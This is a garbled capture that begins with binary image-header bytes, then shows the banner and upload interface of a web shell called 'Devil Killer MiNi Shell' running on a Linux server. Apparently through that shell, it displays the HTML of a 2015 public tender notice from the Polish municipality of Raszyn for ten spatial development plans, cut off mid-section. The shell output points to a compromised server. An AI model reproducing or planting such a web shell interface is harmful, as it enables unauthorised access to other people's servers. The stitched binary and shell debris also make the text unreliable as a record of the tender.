JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151013/149379-N-2015.html

<p class="kh_header"><b>Raszyn: Wykonanie miejscowych planów zagospodarowania przestrzennego dla części terenów położonych na terenie Gminy Raszyn z podziałem na zadania</b><br>
<b>Numer ogłoszenia: 149379 - 2015; data zamieszczenia: 13.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raszyn , ul. Szkolna 2a, 05-090 Raszyn, woj. mazowieckie, tel. 022 7017770, faks 022 7017778.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.raszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie miejscowych planów zagospodarowania przestrzennego dla części terenów położonych na terenie Gminy Raszyn z podziałem na zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie usługi polegającej na wykonaniu miejscowego planu zagospodarowania przestrzennego części terenów Gminy Raszyn z podziałem na zadania:

Zadanie nr 1.
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Raszyn 01 - rejon Południowej Obwodnicy Warszawy. 
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/59/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje miejscowy plan zagospodarowania przestrzennego.

Zadanie nr 2. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Wypędy w Gminie Raszyn - Obszar I.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/60/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Północno - wschodni obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego. 
Pozostały obszar objęty jest Miejscowym planem zagospodarowania przestrzennego części wsi Sękocin Stary, Sękocin Nowy, Janki, Falenty, wsi Wypędy, Puchały w dwóch etapach - Etap I (wieś Wypędy), zatwierdzonym uchwałą Nr XXXVI/623/04 Rady Gminy Raszyn z dnia 21 października 2004 r. (Dz. Urz. Woj. Maz. Nr 316, poz. 10404 z dnia 24 grudnia 2004 r.), zmienioną uchwałą Nr XII/176/07 Rady Gminy Raszyn z dnia 20 września 2007 r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6977 z dnia 25 listopada 2007 r.)

Zadanie nr 3. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Wypędy w Gminie Raszyn - Obszar II.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Nr VIII/61/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Północno - zachodni obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje miejscowy plan zagospodarowania przestrzennego. 
Pozostały obszar objęty jest Miejscowym planem zagospodarowania przestrzennego części wsi Sękocin Stary, Sękocin Nowy, Janki, Falenty, wsi Wypędy, Puchały w dwóch etapach - Etap I (wieś Wypędy), zatwierdzonym uchwałą Nr XXXVI/623/04 Rady Gminy Raszyn z dnia 21 października 2004 r. (Dz. Urz. Woj. Maz. Nr 316, poz. 10404 z dnia 24 grudnia 2004 r.), zmienioną uchwałą Nr XII/176/07 Rady Gminy Raszyn z dnia 20 września 2007 r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6977 z dnia 25 listopada 2007 r.).
Zadanie nr 4. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Janki w Gminie Raszyn - rejon ul. Sokołowskiej i ul. Wspólnej.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/62/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego.

Zadanie nr 5. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy w Gminie Raszyn - rejon Południowej Obwodnicy Warszawy.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/63/15 Rady  Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego.

Zadanie nr 6. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Jaworowa w Gminie Raszyn - rejon Południowej Obwodnicy Warszawy.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/64/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego.

Zadanie nr 7. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy Bankowe w Gminie Raszyn - rejon ul. Długiej.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/65/15 Rady  Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest Miejscowym planem zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I, zatwierdzonym uchwałą Nr LIX/984/05 Rady Gminy Raszyn z dnia 27 października 2005r. (Dz. Urz. Woj. Maz. Nr 266, poz. 8713 z dnia 6 grudnia 2005r.), zmienioną Uchwałą Nr XII/175/07 Rady Gminy Raszyn z dnia 20 września 2007r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6976 z dnia 25 listopada 2007r.), zmienioną uchwałą Nr XLI/451/13 Rady Gminy Raszyn z dnia 26 września 2013r. (Dz. Urz. Woj. Maz., poz. 10595 z dnia 23 października 2013r.) w sprawie zmiany Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I - rejon rzeki Raszynki

Zadanie nr 8. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy Bankowe w Gminie Raszyn - rejon ul. Warszawskiej.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/66/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest Miejscowym planem zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I, zatwierdzonym uchwałą Nr LIX/984/05 Rady Gminy Raszyn z dnia 27 października 2005r. (Dz. Urz. Woj. Maz. Nr 266, poz. 8713 z dnia 6 grudnia 2005r.), zmienioną Uchwałą Nr XII/175/07 Rady Gminy Raszyn z dnia 20 września 2007r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6976 z dnia 25 listopada 2007r.), zmienioną uchwałą Nr XLI/451/13 Rady Gminy Raszyn z dnia 26 września 2013r. (Dz. Urz. Woj. Maz., poz. 10595 z dnia 23 października 2013r.) w sprawie zmiany Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I - rejon rzeki Raszynki.

Zadanie nr 9. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Falenty w Gminie Raszyn - rejon ul. Poniatowskiego.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/67/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego.

Zadanie nr 10. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Falenty Nowe w Gminie Raszyn - rejon ul. Grudzi i ul. Willowej.
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr X/94/15 Rady Gminy Raszyn z dnia 30 czerwca 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest częściowo Miejscowym planem zagospodarowania przestrzennego dla obszaru położonego we wsi Falenty i Falenty Nowe w Gminie Raszyn - część III, zatwierdzonym uchwałą Nr VI/51/07 Rady Gminy Raszyn z dnia 8 marca 2007 r. (Dz. Urz. Woj. Maz. Nr 89, poz. 2140 z dnia 16 maja 2007 r.) oraz jest częściowo objęty Zmianą miejscowego planu zagospodarowania przestrzennego dla obszaru położonego we wsi Falenty i Falenty Nowe w Gminie Raszyn - część III -  Obszar 2 zatwierdzoną uchwałą Nr XLIX/817/10 Rady Gminy Raszyn z dnia 15 lipca 2010r. (Dz. Urz. Woj. Maz. Nr 160, poz. 3970 z dnia 6 września 2010r.)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie spełniania warunku dotyczącego wiedzy i doświadczenia Zamawiający określa minimalne wymagania wskazując, iż Wykonawca powinien wykazać się wykonaniem głównych usług w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i przedmiotu, na rzecz których usługi zostały wykonane oraz z załączeniem dowodów (poświadczeń) dotyczących najważniejszych usług, określających czy usługi zostały wykonane należycie w tym co najmniej: - 3 (trzy) zamówienia, których przedmiotem było opracowanie 3 (trzech) uchwalonych
i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu  do podjęcia uchwały o uchwaleniu - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, odpowiadających w swym zakresie z przedmiotem zamówienia oraz o wielofunkcyjnym przeznaczeniu, każdy obejmujący obszar o powierzchni nie mniejszej niż: a) 40 ha - dla oferty składanej na zadanie nr 1, b) 50 ha - dla oferty składanej na zadanie nr 2, c) 15 ha - dla oferty składanej na zadanie nr 3, d) 50 ha - dla oferty składanej na zadanie nr 4, e) 50 ha - dla oferty składanej na zadanie nr 5, f) 50 ha -  dla oferty składanej na zadanie nr 6, g) 30 ha - dla oferty składanej na zadanie nr 7, h) 10 ha - dla oferty składanej na zadanie nr 8, i) 5 ha - dla oferty składanej na zadanie nr 9, j) 50 ha- dla oferty składanej na zadanie nr 10.
oraz 3 (trzy) zamówienia, których przedmiotem było opracowanie 3 (trzech) uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu do podjęcia uchwały o uchwaleniu - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, dla których uzyskano zgody na zmianę przeznaczenia gruntów rolnych na cele nierolnicze, każda obejmująca obszar o powierzchni nie mniejszej niż: a)  2,5 ha - dla oferty składanej na zadanie nr 2, b) 2,5 ha - dla oferty składanej na zadanie nr 4, c) 5 ha - dla oferty składanej na zadanie nr 5, d) 1 ha - dla oferty składanej na zadanie nr 6, e) 5 ha  - dla oferty składanej na zadanie nr 7, f) 2 ha - dla oferty składanej na zadanie nr 9, g) 1 ha- dla oferty składanej na zadanie nr 10.
W przypadku składania ofert na dwa lub więcej zadań, Zamawiający za wystarczające uzna spełnienie warunku określonego dla zadania obejmującego obszar o większej powierzchni.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie spełniania warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający określa minimalne wymagania wskazując, iż Wykonawca dysponuje następującymi osobami zdolnymi do wykonania zamówienia, w tym:
1) co najmniej 1 osobą, która posiada prawo do wykonywania zawodu urbanisty, zgodnie z art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (j. t. Dz. U z 2015 r. poz. 199 ze zm.), będzie pełniła funkcji głównego projektanta planu oraz posiada doświadczenie zawodowe polegające na wykonywaniu samodzielnie lub w zespole w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert lub krótszym co najmniej: - 3 (trzech) uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu do podjęcia uchwały o uchwaleniu  - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, odpowiadających w swym zakresie z przedmiotem zamówienia o wielofunkcyjnym przeznaczeniu, każdy obejmujący obszar o powierzchni nie mniejszej niż: a)  40 ha - dla oferty składanej na zadanie nr 1, b)  50 ha - dla oferty składanej na zadanie nr 2. c) 15 ha - dla oferty składanej na zadanie nr 3, d) 50 ha - dla oferty składanej na zadanie nr 4, e)  50 ha - dla oferty składanej na zadanie nr 5, f) 50 ha -  dla oferty składanej na zadanie nr 6, g) 30 ha - dla oferty składanej na zadanie nr 7, h) 10 ha - dla oferty składanej na zadanie nr 8, i) 5 ha - dla oferty składanej na zadanie nr 9, j) 50 ha- dla oferty składanej na zadanie nr 10.
oraz 3 (trzech) uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu do podjęcia uchwały o uchwaleniu  - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, dla których uzyskano zgody na zmianę przeznaczenia gruntów rolnych na cele nierolnicze, każda obejmująca obszar o powierzchni nie mniejszej niż: a)  2,5 ha - dla oferty składanej na zadanie nr 2. b) 2,5 ha - dla oferty składanej na zadanie nr 4, c) 5 ha - dla oferty składanej na zadanie nr 5, d) 1 ha - dla oferty składanej na zadanie nr 6, e) 5 ha  - dla oferty składanej na zadanie nr 7, f) 2 ha - dla oferty składanej na zadanie nr 9, g) 1 ha- dla oferty składanej na zadanie nr 10.
2) co najmniej 3 osobowym zespołem projektowym (z wyłączeniem głównego projektanta), w tym specjalistów w dziedzinie: komunikacji, ochrony środowiska i infrastruktury technicznej, którzy będą wykonywać zamówienie. Każda z tych osób musi posiadać wykształcenie kierunkowe z zakresu komunikacji, ochrony środowiska i infrastruktury technicznej do wykonywania prac stanowiących przedmiot zamówienia oraz posiadać doświadczenie zawodowe polegające na wykonaniu w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert lub krótszym co najmniej:
- 3 (trzech) uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego, sporządzonych - od podjęcia uchwały o przystąpieniu do podjęcia uchwały o uchwaleniu  - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, odpowiadających w swym zakresie z przedmiotem zamówienia o wielofunkcyjnym przeznaczeniu każdy obejmujący obszar o powierzchni nie mniejszej niż: a)  40 ha - dla oferty składanej na zadanie nr 1, b)  50 ha - dla oferty składanej na zadanie nr 2., c) 15 ha - dla oferty składanej na zadanie nr 3, d) 50 ha  - dla oferty składanej na zadanie nr 4, e)  50 ha - dla oferty składanej na zadanie nr 5, f) 50 ha  - dla oferty składanej na zadanie nr 6, g) 30 ha - dla oferty składanej na zadanie nr 7, h) 10 ha - dla oferty składanej na zadanie nr 8, i) 5 ha - dla oferty składanej na zadanie nr 9, j) 50 ha - dla oferty składanej na zadanie nr 10.
W przypadku składania ofert na dwa lub więcej zadań łącznie Zamawiający za wystarczające uzna spełnienie warunku określonego dla zadania obejmującego obszar o większej powierzchni.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy powinna zawierać:
a)	wypełniony formularz oferty (oryginał) ,
b)	pełnomocnictwo (oryginał lub notarialnie poświadczona kopia) do reprezentowania wykonawcy w postępowaniu i złożenia oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności w dokumentach rejestracyjnych lub w przypadku oferty składanej przez Wykonawców występujących wspólnie, pełnomocnictwo dla osoby podpisującej w ich imieniu ofertę (oryginał lub kopia notarialnie poświadczona) - załącznik Wykonawcy,
c)	dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu, określone w rozdziale VI SIWZ,
d)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, zgodnie z art. 36b ust. 1 ustawy oraz dołączenia w takim przypadku wykazu usług, które Wykonawca zamierza powierzyć Podwykonawcom /wypełniany w przypadku wykonywania usług przez Podwykonawców wg wzoru stanowiącego załącznik nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności faktury - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy.
